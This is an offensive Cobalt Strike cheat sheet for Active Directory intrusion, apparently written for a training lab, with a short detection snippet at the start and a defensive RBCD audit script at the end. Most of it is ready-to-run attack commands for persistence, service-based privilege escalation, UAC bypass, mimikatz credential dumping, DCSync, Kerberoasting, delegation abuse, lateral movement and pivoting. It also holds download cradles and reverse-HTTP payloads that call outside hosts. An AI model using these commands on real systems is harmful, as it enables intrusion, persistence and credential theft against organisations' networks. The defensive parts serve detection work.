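SAMPLE_CMDLINE = "powershell -nop -w hidden -enc " + encode_command(
    'IEX ((new-object net.webclient).downloadstring("http://c2.example/a"))')

if __name__ == "__main__":
    for cl in (SAMPLE_CMDLINE,
               "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"):
        print(triage(cl))
```

The decode step matters more than the marker list: an encoded command line is not suspicious by itself (plenty of management tooling uses it), but once decoded the script can be run through whatever content rules already exist for plain PowerShell.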
Normal User Persistence
Task Scheduler
Usage: Create scheduled task for persistence (user-level).
```
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoAC...GEAIgApACkA" -n "Updater" -m add -o hourly
```
Startup Folder
Usage: Place persistence in user’s startup folder.
```
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAo..vAGEAIgApACkA" -f "UserEnvSetup" -m add
```
Registry Autorun
Usage: Use registry run keys for persistence.
```
# Upload the payload to a shared location
beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
# Create registry persistence
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```
Privileged System User Persistence
Windows Service
Usage: Create Windows service for system-level persistence.
```
# Upload the service binary
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
# Create the service
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add
```
WMI Event Persistence
Usage: Use WMI events for persistence.
```
# Upload the payload
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
# Create the WMI event subscription
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
```
Privilege Escalation
Service Enumeration
Usage: Identify potentially vulnerable Windows services.
```
# Service enumeration methods
beacon> powershell Get-Service | fl
beacon> run wmic service get name, pathname
beacon> run sc query
beacon> run sc qc VulnService2
# Service management
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
# Automated vulnerability discovery
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit
```
Service Exploitation Techniques
CASE 1: Unquoted Service Path
Usage: Exploit unquoted service paths to execute malicious binaries.
```
# 1. Identify vulnerable services
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath
# 2. Check directory permissions
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
# 3. Place the binary in the service path
beacon> cd "C:\Program Files\Vulnerable Services"
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe Service.exe
# 4. Restart the service to trigger execution
beacon> run sc stop VulnService1
beacon> run sc start VulnService1
beacon> connect localhost 4444
```
CASE 2: Weak Service Permissions
Usage: Modify service configuration to point to malicious binary.
```
# 1. Identify services with weak permissions
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
# 2. Check the service ACL
beacon> powershell-import C:\Tools\Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access
# 3. Prepare the binary
beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
# 4. Modify the service configuration
beacon> run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
beacon> run sc qc VulnService2
# 5. Restart the service
beacon> run sc stop VulnService2
beacon> run sc start VulnService2
beacon> connect localhost 4444
```
CASE 3: Weak Service Binary Permissions
Usage: Overwrite service binary with malicious executable.
```
# 1. Identify vulnerable service binaries
beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
# 2. Check binary permissions
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl
# 3. Prepare and upload the replacement binary
PS C:\Payloads> copy "tcp-local_x64.svc.exe" "Service 3.exe"
beacon> run sc stop VulnService3
beacon> cd "C:\Program Files\Vulnerable Services"
beacon> upload "C:\Payloads\Service 3.exe"
# 4. Start the service
beacon> run sc start VulnService3
beacon> connect localhost 4444
```
UAC Bypass
Usage: Bypass User Account Control to elevate privileges.
```
# Check the current user's group memberships
beacon> run whoami /groups
# UAC bypass using scheduled tasks
beacon> elevate uac-schtasks tcp-local
# Verify the new beacon connection
beacon> run netstat -anop tcp
beacon> connect localhost 4444
```
Credential Theft
Special Beacon Command Prefixes
- `!` : run the command in the elevated context of the SYSTEM user
- `@` : impersonate Beacon's thread token
Credential Dumping Techniques
Local Credential Dumping
Usage: Extract credentials from local system.
```
# Dump the local SAM database
beacon> mimikatz !lsadump::sam
# Dump logon passwords from LSASS
beacon> mimikatz !sekurlsa::logonpasswords
# Dump Kerberos encryption keys
beacon> mimikatz !sekurlsa::ekeys
# Dump Domain Cached Credentials (cannot be used for lateral movement unless cracked)
beacon> mimikatz !lsadump::cache
```
Kerberos Ticket Operations
Usage: Extract and manage Kerberos tickets.
```
# List cached Kerberos tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump a specific TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt
```
Domain Controller Credential Extraction
Usage: Extract credentials from Domain Controller.
```
# DCSync attack (requires appropriate privileges)
beacon> make_token DEV\nlamb F3rrari
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
# Local krbtgt extraction on the DC
beacon> mimikatz !lsadump::lsa /inject /name:krbtgt
```
Domain Reconnaissance
PowerView Enumeration
Usage: Comprehensive Active Directory enumeration using PowerView.
```
# Import PowerView
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
# Domain information
beacon> powerpick Get-Domain -Domain <domain>
beacon> powerpick Get-DomainSID
beacon> powerpick Get-DomainController | select Forest, Name, OSVersion | fl
beacon> powerpick Get-ForestDomain -Forest <forest>
beacon> powerpick Get-DomainPolicyData | select -expand SystemAccess
# User enumeration
beacon> powerpick Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl
beacon> powerpick Get-DomainUser | select cn,serviceprincipalname # Kerberoastable users
beacon> powerpick Get-DomainUser -PreauthNotRequired # ASREPRoastable users
beacon> powerpick Get-DomainUser -TrustedToAuth # Constrained delegation
# Computer enumeration
beacon> powerpick Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
beacon> powerpick Get-DomainComputer -Unconstrained | select cn, dnshostname # Unconstrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select cn, msdsallowedtodelegateto # Constrained delegation
# Organizational Unit enumeration
beacon> powerpick Get-DomainOU -Properties Name | sort -Property Name
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName
# Group enumeration
beacon> powerpick Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName
# Group Policy enumeration
beacon> powerpick Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName
beacon> powerpick Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
beacon> powerpick Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
# Trust enumeration
beacon> powerpick Get-DomainTrust
# Access enumeration
beacon> powerpick Find-LocalAdminAccess
beacon> powerpick Invoke-CheckLocalAdminAccess -ComputerName <server_fqdn>
beacon> powerpick Invoke-UserHunter
beacon> powerpick Find-PSRemotingLocalAdminAccess -ComputerName <server_fqdn>
beacon> powerpick Find-WMILocalAdminAccess -ComputerName <server_fqdn>
```
Alternative Enumeration Tools
SharpView
Usage: .NET version of PowerView for environments where PowerShell is restricted.
```
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain
```
ADSearch
Usage: Lightweight LDAP search tool for Active Directory enumeration.
```
# Basic searches
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins*))"
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member
# Kerberoastable users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# ASREPRoastable users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
# Delegation enumeration
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Use the --json parameter for formatted output
```
User Impersonation
Pass The Hash Attack
Usage: Authenticate using NTLM hash without knowing the plaintext password.
```
# Check current access
beacon> getuid
beacon> ls \\web.dev.cyberbotic.io\c$
# PTH using Cobalt Strike's built-in method
beacon> pth DEV\jking <ntlm_hash>
# Verify access
beacon> powerpick Find-LocalAdminAccess
# Revert to the original token
beacon> rev2self
```
Pass The Ticket Attack
Usage: Use Kerberos tickets for authentication.
```
# Method 1: Create a sacrificial process and inject the ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123
# Inject the ticket into the new logon session
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
# Method 2: Combined approach (single command)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /ticket:doIFuj[...snip...]lDLklP
# Steal the token from the sacrificial process
beacon> steal_token 4748
```
OverPass The Hash
Usage: Request TGT using NTLM or AES hash.
# Basic overpass the hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:<ntlm_hash> /nowrap
# Better OPSEC using AES256 hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:<aes256_hash> /domain:DEV /opsec /nowrap
Token Impersonation & Process Injection
Usage: Leverage existing process tokens for access.
# Steal token from specific process
beacon> steal_token 4464
# Inject beacon into process
beacon> inject 4464 x64 tcp-local
# Shellcode injection
beacon> shinject <pid> x64 /path/to/shellcode.bin
Lateral Movement
Jump Methods
Usage: Move laterally using various execution methods.
# Available jump methods
beacon> jump psexec64 <target> <listener> # SMB-based execution
beacon> jump psexec_psh <target> <listener> # PowerShell-based execution
beacon> jump winrm64 <target> <listener> # WinRM execution
Remote Execution
Usage: Execute payloads on remote systems.
# Remote execution methods
beacon> remote-exec psexec <target> <command>
beacon> remote-exec winrm <target> <command>
beacon> remote-exec wmi <target> <command>
WMI Lateral Movement Example
Usage: Step-by-step WMI-based lateral movement.
# 1. Upload payload to target
beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
# 2. Execute via WMI
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
# 3. Connect to SMB beacon
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
Advanced Lateral Movement
Remote .NET Assembly Execution
Usage: Execute .NET assemblies remotely without file upload.
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe OSInfo -ComputerName=web
DCOM Execution (Better OPSEC)
Usage: Use DCOM for stealthier lateral movement.
# Import DCOM script
beacon> powershell-import C:\Tools\Invoke-DCOM.ps1
# Execute via DCOM
beacon> powershell Invoke-DCOM -ComputerName web.dev.cyberbotic.io -Method MMC20.Application -Command C:\Windows\smb_x64.exe
# Connect to beacon
beacon> link web.dev.cyberbotic.io agent_vinod
Note: for remote-exec methods that run the payload as a Windows service, use a service binary payload (svc.exe), since the service control manager expects a service executable.
Session Passing
Beacon to Beacon Passing
Usage: Create additional beacon sessions within Cobalt Strike.
# Spawn new HTTP beacon while keeping DNS as lifeline
beacon> spawn x64 http
Foreign Listener (Cobalt Strike to Metasploit)
Usage: Pass session from Cobalt Strike to Metasploit (staged payload - x86 only).
# 1. Setup Metasploit listener
attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > run
# 2. Create Foreign Listener in Cobalt Strike with above IP & port details
# 3. Execute session passing
beacon> jump psexec64 <target> Foreign_listener
Shellcode Injection (Stageless Payload)
Usage: Inject Metasploit shellcode into process memory.
# 1. Setup Metasploit listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST 10.10.5.50
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit
# 2. Generate stageless payload
ubuntu@DESKTOP-3BSK7NO ~> msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.50 LPORT=8080 -f raw -o /mnt/c/Payloads/msf_http_x64.bin
# 3. Inject shellcode into new process
beacon> shspawn x64 C:\Payloads\msf_http_x64.bin
Pivoting
SOCKS Proxy Setup
Usage: Establish SOCKS proxy for pivoting through compromised hosts.
# Enable SOCKS proxy (SOCKS 5 recommended for better OPSEC)
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Verify proxy on team server
attacker@ubuntu ~> sudo ss -lpnt
# Configure proxychains
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password
# Use proxy for network operations
attacker@ubuntu ~> proxychains nmap -n -Pn -sT -p445,3389,4444,5985 10.10.122.10
ubuntu@DESKTOP-3BSK7NO ~> proxychains wmiexec.py DEV/jking@10.10.122.30
Windows Pivoting Techniques
Usage: Pivot from Windows systems using various methods.
# Create new logon session with credentials
ps> runas /netonly /user:dev/bfarmer mmc.exe
# Pass-the-hash with Mimikatz
ps> mimikatz # privilege::debug
ps> mimikatz # sekurlsa::pth /domain:DEV /user:bfarmer /ntlm:4ea24377a53e67e78b2bd853974420fc /run:mmc.exe
# PowerShell with credentials
PS C:\Users\Attacker> $cred = Get-Credential
PS C:\Users\Attacker> Get-ADComputer -Server 10.10.122.10 -Filter * -Credential $cred | select
# Browser proxy for web applications (use FoxyProxy plugin)
Reverse Port Forward
Usage: Forward traffic from remote host to team server.
# Setup reverse port forward
beacon> rportfwd 8080 127.0.0.1 80
beacon> run netstat -anp tcp
# Test access from remote host
ps> iwr -Uri http://wkstn-2:8080/a
# Firewall rules for listener
beacon> powershell New-NetFirewallRule -DisplayName "Test Rule" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
beacon> powershell Remove-NetFirewallRule -DisplayName "Test Rule"
NTLM Relay Setup
Usage: Perform NTLM relay attacks through SOCKS proxy.
# 1. Setup SOCKS proxy on beacon
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# 2. Configure proxychains
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password
# 3. Setup NTLM relay
$ sudo proxychains ntlmrelayx.py -t smb://10.10.122.10 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAyADMALgAxADAAMgA6ADgAMAA4ADAALwBiACIAKQA='
# 4. Setup reverse port forwarding
beacon> rportfwd 8080 127.0.0.1 80
beacon> rportfwd 8445 127.0.0.1 445
# 5. Setup PortBender for SMB redirection
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
# 6. Force authentication (manual access or use print spooler)
# 7. Connect to relayed session
beacon> link dc-2.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
Data Protection API
Windows Vault Enumeration
Usage: Discover and extract credentials from Windows vaults.
# Check for stored credentials
beacon> run vaultcmd /list
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
beacon> run vaultcmd /listcreds:"Web Credentials" /all
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
# Extract vault credentials with Mimikatz
beacon> mimikatz !vault::list
beacon> mimikatz !vault::cred /patch
Scheduled Task Credentials Extraction
Usage: Extract credentials used by scheduled tasks.
# 1. Locate encrypted credential blobs
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
# 2. Identify master key GUID for the blob
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E
# 3. Extract master keys from LSASS
beacon> mimikatz !sekurlsa::dpapi
# 4. Decrypt credentials using master key
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:<masterkey>
RDP Credential Extraction
Usage: Extract stored RDP credentials from user profile.
# 1. Enumerate credential files with Seatbelt
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
# 2. Verify credential blob location
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
# 3. Locate master key
beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
# 4. Decrypt master key (sekurlsa::dpapi needs an elevated session via !; dpapi::masterkey /rpc runs in the user's context via the @ modifier)
beacon> mimikatz !sekurlsa::dpapi
beacon> mimikatz @dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc
# 5. Decrypt credential blob
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:<masterkey>
Kerberos Attacks
Kerberoasting
Usage: Extract and crack service account passwords.
# 1. Identify kerberoastable accounts
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# 2. Request service tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
# 3. Crack the hash
ps> hashcat -a 0 -m 13100 hashes.txt wordlist.txt
ASREPRoast
Usage: Attack accounts with “Do not require Kerberos preauthentication” enabled.
# 1. Identify ASREPRoastable accounts
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
# 2. Request AS-REP without preauth
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
# 3. Crack the hash
ps> hashcat -a 0 -m 18200 hashes.txt wordlist.txt
Unconstrained Delegation
Usage: Exploit unconstrained delegation to capture TGT tickets.
# 1. Identify computers with unconstrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# 2. Monitor for cached TGT tickets (requires SYSTEM access)
beacon> getuid
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap
# 3. Force DC authentication using PrintSpooler
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io
# 4. Extract and use captured DC TGT with S4U
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
# 5. Create sacrificial logon and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=
# 6. Access target resources
beacon> steal_token 2664
beacon> ls \\dc-2.dev.cyberbotic.io\c$
Constrained Delegation
Usage: Abuse constrained delegation to impersonate users.
# 1. Identify computers with constrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# 2. Extract machine TGT
beacon> getuid
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# 3. Perform S4U attack to impersonate user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap
# 4. Alternative service abuse (if needed)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
# 5. Inject service ticket and access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv
beacon> steal_token 5540
beacon> ls \\dc-2.dev.cyberbotic.io\c$
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
Resource-Based Constrained Delegation (RBCD)
Usage: Abuse writable msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
# 1. Find computers with writable AllowedToActOnBehalfOfOtherIdentity
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json
# Alternative: Find computers where we can write this attribute
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
# 2. Resolve SID to identify the principal
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
# 3. Configure delegation rights
beacon> powerpick Get-DomainComputer -Identity wkstn-2 -Properties objectSid
beacon> powerpick $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "dc-2" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
# 4. Verify configuration
beacon> powerpick Get-DomainComputer -Identity "dc-2" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
# 5. Extract our computer's TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# 6. Perform S4U attack
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:WKSTN-2$ /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /ticket:doIFuD[...]5JTw== /nowrap
# 7. Use resulting ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGcD[...]MuaW8=
beacon> steal_token 4092
beacon> ls \\dc-2.dev.cyberbotic.io\c$
# 8. Clean up delegation rights
beacon> powerpick Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
Alternative: Using Fake Computer Account
Usage: Create fake computer account for RBCD attack.
# 1. Check machine account quota
beacon> powerpick Get-DomainObject -Identity "DC=dev,DC=cyberbotic,DC=io" -Properties ms-DS-MachineAccountQuota
# 2. Create fake computer account
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make
# 3. Generate hash for the fake computer
PS> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:<password> /user:EvilComputer$ /domain:dev.cyberbotic.io
# 4. Request TGT for fake computer
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:EvilComputer$ /aes256:<aes256> /nowrap
# Continue with steps 3-8 from above using the fake computer account
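Added audit example (not part of the original cheat sheet, nor PowerView or Rubeus code): it decodes the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor that step 3 writes and lists which principals each computer trusts for RBCD, so a grant like the one above stands out in a domain review. It assumes the RSAT ActiveDirectory module in a domain-joined session; the SDDL string used in the offline check is the one from step 3.

```powershell
# Added audit example, not part of the original cheat sheet or of PowerView/Rubeus.
# Decodes msDS-AllowedToActOnBehalfOfOtherIdentity (the attribute written in step 3)
# and lists which principals may act on behalf of other identities to each computer.
# Assumes the RSAT ActiveDirectory module and a domain-joined session.

function ConvertFrom-RbcdDescriptor {
    # Accepts the attribute as returned by Get-ADComputer (ActiveDirectorySecurity),
    # as raw bytes, or as an SDDL string such as the one built in step 3.
    param([Parameter(Mandatory)]$Descriptor, [string]$Computer = '<offline>')

    if ($Descriptor -is [string]) {
        $rsd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Descriptor)
    } elseif ($Descriptor -is [byte[]]) {
        $rsd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Descriptor, 0)
    } else {
        $bytes = $Descriptor.GetSecurityDescriptorBinaryForm()
        $rsd = [System.Security.AccessControl.RawSecurityDescriptor]::new($bytes, 0)
    }

    foreach ($ace in $rsd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        # Resolve the SID where possible; a SID that no longer resolves (deleted
        # account) is itself worth a closer look.
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = '<unresolved>' }
        [pscustomobject]@{
            Computer  = $Computer
            AceType   = $ace.AceType      # only AccessAllowed entries grant RBCD
            Principal = $name
            Sid       = $sid.Value
        }
    }
}

function Get-RbcdGrant {
    # Enumerates every computer object whose RBCD attribute is populated.
    param([string]$Server)
    Import-Module ActiveDirectory
    $query = @{
        LDAPFilter = '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)'
        Properties = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    }
    if ($Server) { $query.Server = $Server }
    foreach ($c in Get-ADComputer @query) {
        ConvertFrom-RbcdDescriptor -Descriptor $c.'msDS-AllowedToActOnBehalfOfOtherIdentity' -Computer $c.Name
    }
}

# Offline check of the descriptor from step 3: one AccessAllowed ACE for RID 1109.
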